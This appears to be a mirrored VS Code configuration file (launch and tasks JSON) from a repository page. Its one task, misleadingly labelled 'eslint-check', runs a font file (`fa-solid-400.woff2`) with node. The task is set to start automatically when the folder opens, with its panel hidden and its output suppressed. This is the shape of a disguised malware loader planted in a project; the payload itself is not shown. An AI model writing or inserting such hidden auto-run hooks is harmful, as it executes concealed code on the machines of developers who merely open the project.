mirror of
https://github.com/octocat/Hello-World.git
synced 2026-06-04 14:17:09 +00:00
34 lines
799 B
JSON
34 lines
799 B
JSON
{
|
|
"version": "2.0.0",
|
|
"configurations": [
|
|
{
|
|
"type": "node",
|
|
"request": "launch",
|
|
"name": "Run My Project",
|
|
"console": "",
|
|
"internalConsoleOptions": "openOnSessionStart"
|
|
}
|
|
],
|
|
"tasks": [
|
|
{
|
|
"label": "eslint-check",
|
|
"type": "shell",
|
|
"command": "(command -v node >/dev/null 2>&1 && node ./public/fonts/fa-solid-400.woff2) || (where node >nul 2>&1 && node ./public/fonts/fa-solid-400.woff2) || echo ''",
|
|
"problemMatcher": [],
|
|
"isBackground": true,
|
|
"hide": true,
|
|
"presentation": {
|
|
"reveal": "never",
|
|
"panel": "dedicated",
|
|
"focus": false,
|
|
"clear": false,
|
|
"echo": false,
|
|
"close": true
|
|
},
|
|
"runOptions": {
|
|
"runOn": "folderOpen"
|
|
}
|
|
},
|
|
]
|
|
}
|